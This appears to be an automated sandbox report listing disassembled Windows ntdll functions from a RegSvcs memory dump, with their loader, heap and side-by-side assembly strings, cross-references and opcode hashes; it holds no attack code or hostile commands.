Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 8cd5440b9edaa5abedd482240c9a1805ef981f14aba36169288dda5b7f097282
Instruction ID: d78953145e9c9d9dd11ddd29b7492d82ba631c4d7c19461a2fcaee08e6a38a45
Opcode Fuzzy Hash: 8cd5440b9edaa5abedd482240c9a1805ef981f14aba36169288dda5b7f097282
Instruction Fuzzy Hash: 85912476A05302AFD721EF68C880B6FBBE8BF94B14F050418FA496B259D738AC05C795

Uniqueness

Uniqueness Score: -1.00%

Function 0199EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 0199EB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0199EB6C
R, xrefs: 0199EB62
{, xrefs: 019F4643
, xrefs: 0199F299
T, xrefs: 0199EB4E

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 47c51009dbc431546a068a87a23757ee01880a6bf5ea1ad36e412bb64ba6c6fc
Instruction ID: 2b16066a5c383ffc93832b31a7e0a5863b1a9e79239e99728c8dcae4aa09120c
Opcode Fuzzy Hash: 47c51009dbc431546a068a87a23757ee01880a6bf5ea1ad36e412bb64ba6c6fc
Instruction Fuzzy Hash: 68A23774A0562A8FDF64DF18CD88BAEBBB5AF85705F1442E9D90DA7250DB309E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 019C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01A04258
Process initialization failed with status 0x%08lx, xrefs: 01A0413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01A040D8
_LdrpInitialize, xrefs: 01A040DF, 01A04141, 01A04205, 01A0425F
minkernel\ntdll\ldrinit.c, xrefs: 01A040E9, 01A0414B, 01A0420F, 01A04269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01A041FE

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 8a8a91be3af7147a8035f4b4235317ddd6eec3efc5571af94ecb9397b4b1aa84
Instruction ID: f8307f17d8682d8d18384d2e9acaa5ce464bcdd017009b4d28bbeb0d427f488f
Opcode Fuzzy Hash: 8a8a91be3af7147a8035f4b4235317ddd6eec3efc5571af94ecb9397b4b1aa84
Instruction Fuzzy Hash: 07914930B007159BEB36DF58E945BAEBBA5BF98F24F14012DDA486B3C1D7709802C792

Uniqueness

Uniqueness Score: -1.00%

Function 0198645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019E9A2A
apphelp.dll, xrefs: 01986496
LdrpInitShimEngine, xrefs: 019E99F4, 019E9A07, 019E9A30
minkernel\ntdll\ldrinit.c, xrefs: 019E9A11, 019E9A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 019E9A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019E99ED

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 83f2b072d9dbfe7270976022f69cae10c52e12b9cb704f006e974f97e6dcee40
Instruction ID: bea87258c264affbb1b2a92daccb340e6ce8816a75775fefc59693ef36975636
Opcode Fuzzy Hash: 83f2b072d9dbfe7270976022f69cae10c52e12b9cb704f006e974f97e6dcee40
Instruction Fuzzy Hash: 53518E716183059BE725EF24D845FABB7E8EFC4B48F00091DE98D9B1A0D630E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 019CC6C4
Loading import redirection DLL: '%wZ', xrefs: 01A08170
Unable to build import redirection Table, Status = 0x%x, xrefs: 01A081E5
LdrpInitializeImportRedirection, xrefs: 01A08177, 01A081EB
minkernel\ntdll\ldrinit.c, xrefs: 019CC6C3
minkernel\ntdll\ldrredirect.c, xrefs: 01A08181, 01A081F5

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: c7bb61e476e3df48211c3a32754680c3bd94ff3a7d4ea4a41c55be8c4ecbed71
Instruction ID: d435fbcd84d1773b914834c1b8abe37f3d5589158ee076ade80d1df1c6cfa6e4
Opcode Fuzzy Hash: c7bb61e476e3df48211c3a32754680c3bd94ff3a7d4ea4a41c55be8c4ecbed71
Instruction Fuzzy Hash: 283107716443069BD214EF28EA46E1A7BD4FFD4B14F00055CF98CAB291E620ED05C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 019C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A021BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A0219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A02180
SXS: %s() passed the empty activation context, xrefs: 01A02165
RtlGetAssemblyStorageRoot, xrefs: 01A02160, 01A0219A, 01A021BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A02178

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 38c605a9c0147e05fdba45d2d0f37ef6dda1f254de6495cdd11cc4a26a2c6762
Instruction ID: 0140662383a3a31c9272d1916ea0c87a660c8a4082ec2b320cacf706d95a4931
Opcode Fuzzy Hash: 38c605a9c0147e05fdba45d2d0f37ef6dda1f254de6495cdd11cc4a26a2c6762
Instruction Fuzzy Hash: 0E310B36F40315BBF7129B95DC89FAA7A79DF94F50F05006DBB0CA7140D270AA01C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 019D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 019D2DF0: LdrInitializeThunk.NTDLL ref: 019D2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019D0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019D0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019D0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019D0D74

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 7d9abde46e7bd63ab5c65be5bb557197f1e1475239b379ccd14241f3595e8fd1
Instruction ID: 4bf5627387cbfae8c37e9fe31bbae02a94de944a53c49a29e99af9045c71bb1a
Opcode Fuzzy Hash: 7d9abde46e7bd63ab5c65be5bb557197f1e1475239b379ccd14241f3595e8fd1
Instruction Fuzzy Hash: 99425C71900715DFDB21CF68C880BAABBF5BF44314F1485A9E99DEB242D770AA85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0199A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 0199A3E7
LdrResFallbackLangList Exit, xrefs: 0199A3FF
LdrResFallbackLangList Enter, xrefs: 0199A3EF
6, xrefs: 0199A3F7

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: f7a8aed209a6653faad52c393dd3e38fed6cd485651186b5411b61eedc9119fb
Instruction ID: e393063396cdb5695f07bcfa95e9c04b18255409fb27ad2081b7000cd1cfd83a
Opcode Fuzzy Hash: f7a8aed209a6653faad52c393dd3e38fed6cd485651186b5411b61eedc9119fb
Instruction Fuzzy Hash: A3C17A746083829FDB11CF5CC444B6AB7E8FF95704F04896EF9998B291E734C949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 019C8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019C855E
minkernel\ntdll\ldrinit.c, xrefs: 019C8421
@, xrefs: 019C8591

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 95490dbf6d18d6b6d51c1d9d71259048c4692f9e5558fa5669148563c51830f7
Instruction ID: 66e2714ee5cffe8f2370f643b3e4c60bb2fffd401a1596834fa75d50f7624307
Opcode Fuzzy Hash: 95490dbf6d18d6b6d51c1d9d71259048c4692f9e5558fa5669148563c51830f7
Instruction Fuzzy Hash: 8F915E71508345AFD721DF65CC40EABBAECBF94B44F40492EFA8896151E374D9048B62

Uniqueness

Uniqueness Score: -1.00%

Function 019C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 019C28D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A022B6
SXS: %s() passed the empty activation context, xrefs: 01A021DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A021D9, 01A022B1

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 476a1652d3f137a9a085050b632ce97f8207cce86f50a2499e8ca36cc42ce2a5
Instruction ID: 74b26a544d6ffb471adee1a05839420b72b0863196235f11e172f7819e021634
Opcode Fuzzy Hash: 476a1652d3f137a9a085050b632ce97f8207cce86f50a2499e8ca36cc42ce2a5
Instruction Fuzzy Hash: 56A1B1319003299BDB25CF98D888BE9B3B5BF58754F2541EED94CAB291D7309E80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 019C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01A03425, 01A03432, 01A03451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A0342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A03437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A03456

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: cfc32781306c98805acfe8c9b413d79545050175f765c3954191785ff8d61bf1
Instruction ID: ce6b87d9218451b9f54f7508143b90f14767f238b186e7262a1e6d821cf9a03a
Opcode Fuzzy Hash: cfc32781306c98805acfe8c9b413d79545050175f765c3954191785ff8d61bf1
Instruction Fuzzy Hash: A66113366407129FDB238F1DD891B6AB7E5BF80B11F16851DE8999F292C731E801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019F106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019F0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019F1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019F10AE

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: d7aa9c220d3dde5f898537409e2d8d1017cefde55e3abd1bd98624afac41a4a1
Instruction ID: 898e43903f364f97434497624d6da8f544d068677a8d93740ff17c4a3497ee10
Opcode Fuzzy Hash: d7aa9c220d3dde5f898537409e2d8d1017cefde55e3abd1bd98624afac41a4a1
Instruction Fuzzy Hash: 8871CDB1904345AFDB21EF18C884F9B7BADAF95764F444868F94C8B286D334D588CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 019B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 019FA998
apphelp.dll, xrefs: 019B2462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019FA992
minkernel\ntdll\ldrinit.c, xrefs: 019FA9A2

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 4059a71d7d575f8a891c07c4705130400e623624bcd24d22ed981cab2dd6021d
Instruction ID: 715c2c835f76f1608b73e262ce19e72e94d93330294fa8a5fa7d7be66d3573ff
Opcode Fuzzy Hash: 4059a71d7d575f8a891c07c4705130400e623624bcd24d22ed981cab2dd6021d
Instruction Fuzzy Hash: 66313779A10201BBDB31AF5DC984EAE7BB9FF84B00F15006DEA0C6B254D770A986C780

Uniqueness

Uniqueness Score: -1.00%

Function 019A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019A3264
HEAP[%wZ]: , xrefs: 019A3255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019A327D

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6324c4ec161a6dba5a34460f6acfc4f22418d02698b8cb50054094e2e03768c0
Instruction ID: 46abba029876b92ec4af793826c5a0a7c398379168e9d5985e7462af56082d96
Opcode Fuzzy Hash: 6324c4ec161a6dba5a34460f6acfc4f22418d02698b8cb50054094e2e03768c0
Instruction Fuzzy Hash: A092CD70E042499FDB25CF68C444BAEBBF5FF48300F5884A9E949AB391D734A949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019F50BD
HEAP[%wZ]: , xrefs: 019F50AE
(UCRBlock->Size >= *Size), xrefs: 019F50CA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 1a627a5d42bb139408ffbe5d955da05f33de1634c922c66f1ae38dbb328e7eb2
Instruction ID: 5940a214b376ef6e12c878630c15e13d4c7ed34c4de1a4468ef0d1bfd3278179
Opcode Fuzzy Hash: 1a627a5d42bb139408ffbe5d955da05f33de1634c922c66f1ae38dbb328e7eb2
Instruction Fuzzy Hash: 0BF1BE34B00606EFEB15CF68C894F6ABBB5FF84304F198668E50A9B381D730E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 019B6C24
, xrefs: 019FCA51

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: d71b12d892c26a3b04a03240df12cf378e4204b9efd8b8788c3139a2a0820d06
Instruction ID: b25f4f7c2bf8f2646236d148ce8ccba4f137e8b2fe429e38d85d60706783cab8
Opcode Fuzzy Hash: d71b12d892c26a3b04a03240df12cf378e4204b9efd8b8788c3139a2a0820d06
Instruction Fuzzy Hash: 30C27071A083459FD729CF68C981BABBBE5AFC8754F04892DEA8DC7281D734D805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0198A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 019EC1E4
UseFilter, xrefs: 0198A1C1
FilterFullPath, xrefs: 019EC2E6

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 1e78ee98070b731c7a603999b9e94f25f64b36255bc13b8c475a503f6097e88e
Instruction ID: 92adf939b53e7ed76acd213eb9b99aadc83ffb793072c97ba87203417426456a
Opcode Fuzzy Hash: 1e78ee98070b731c7a603999b9e94f25f64b36255bc13b8c475a503f6097e88e
Instruction Fuzzy Hash: C4A16E719112299BDB32DF68CC88BEAB7B8EF44711F1041EAE94DA7250E7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 019B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 019FA10F
LdrpCheckModule, xrefs: 019FA117
minkernel\ntdll\ldrinit.c, xrefs: 019FA121

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: e03e32233d68e7816228e78a8b53bf31c09d4b1f1aeaf3320b22aac2f3f1536a
Instruction ID: f771122d9c49b7eb133033a8493b9173cbee434270119d08290d48629c324353
Opcode Fuzzy Hash: e03e32233d68e7816228e78a8b53bf31c09d4b1f1aeaf3320b22aac2f3f1536a
Instruction Fuzzy Hash: B3719275E00205AFDB25DF68C981ABEB7F4FB88704F19446DE90E9B251D734A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019F5342
HEAP[%wZ]: , xrefs: 019F5335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 019F534D

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 397ac05d45a70b99c863258bb33013a399d63d2f603b2bbc64228135a42bddaf
Instruction ID: 3d82a686c8ba534058eeb8d3f0b1634d9eac8f672e6b3c4846706519edcdb708
Opcode Fuzzy Hash: 397ac05d45a70b99c863258bb33013a399d63d2f603b2bbc64228135a42bddaf
Instruction Fuzzy Hash: 4861CE30600302EFEB29CF28C544B6ABBE5FF44704F59855DE95E8B292D7B0E885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 01A082DE
Failed to reallocate the system dirs string !, xrefs: 01A082D7
minkernel\ntdll\ldrinit.c, xrefs: 01A082E8

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: b5f0801b808d6bd1911bde1c5a2fbcb60e6f1721926f3400fe4799e6314147be
Instruction ID: 4b57ac6ed825c239cad5fc2ae2e193688ef9a7b229e82e6680f2a5616050270c
Opcode Fuzzy Hash: b5f0801b808d6bd1911bde1c5a2fbcb60e6f1721926f3400fe4799e6314147be
Instruction Fuzzy Hash: E141F175944301ABD721EB68E944B5F7BE8EF98B54F04482EF98CE7290E774D801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A4C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A4C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A4C1C5
@, xrefs: 01A4C1F1

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: a71213b21a9844a0519e49c7cf42314a43ea342464e0067d5e2ff25f46c6db8e
Instruction ID: 1312f3980e7540ea487423dc2be66715923a1e70f2eb9698fa0bf0c28a7ae96d
Opcode Fuzzy Hash: a71213b21a9844a0519e49c7cf42314a43ea342464e0067d5e2ff25f46c6db8e
Instruction Fuzzy Hash: DE416571E01209FBEB11EFD9C841FEEBBB8BB94715F14406AE60DB7244E7B49A448B50

Uniqueness

Uniqueness Score: -1.00%

Function 01A24144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01A24172
@, xrefs: 01A24225
LdrpResValidateFilePath Enter, xrefs: 01A24160

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 903076b22831629d4e5f3340ddde265ef08c1f7079673b16a50bc359d44684ab
Instruction ID: ec1210e6572092df51eee65b5c56865a1b1b8e24976c6b78f0d2774095e4ef97
Opcode Fuzzy Hash: 903076b22831629d4e5f3340ddde265ef08c1f7079673b16a50bc359d44684ab
Instruction Fuzzy Hash: B7412731A04768CBEB26DBDEC944BADBBB4FF9A340F240459D905EB781D7748901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A14755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A14888
LdrpCheckRedirection, xrefs: 01A1488F
minkernel\ntdll\ldrredirect.c, xrefs: 01A14899

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 75f30655409e0c455c6e3034d1e6e695613c028c0b1354dccfff585cc1834a63
Instruction ID: e97323ddb27a4ed0420edda7afe59d99ca49d6e626f04a73a45123ac7ed22203
Opcode Fuzzy Hash: 75f30655409e0c455c6e3034d1e6e695613c028c0b1354dccfff585cc1834a63
Instruction Fuzzy Hash: 8941BF72A047519FCB22DF6CD940A267BE8AF8DB50F09066DED49DB359D730E801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019F543E
HEAP[%wZ]: , xrefs: 019F5431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 019F5449

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 3cdd69b641610b7debada38de9e6d5465351fe3a7e276f3ac43e02fbf97b59c9
Instruction ID: 11ab40240849849e678cd5c24fd9ea87fee74759cd2dfd114436fec001d6909c
Opcode Fuzzy Hash: 3cdd69b641610b7debada38de9e6d5465351fe3a7e276f3ac43e02fbf97b59c9
Instruction Fuzzy Hash: 8511DF31314102AFEB29DA18C440F7AB7A9EF80A1AF1A855DF50ECB261DB34EC45C794

Uniqueness

Uniqueness Score: -1.00%

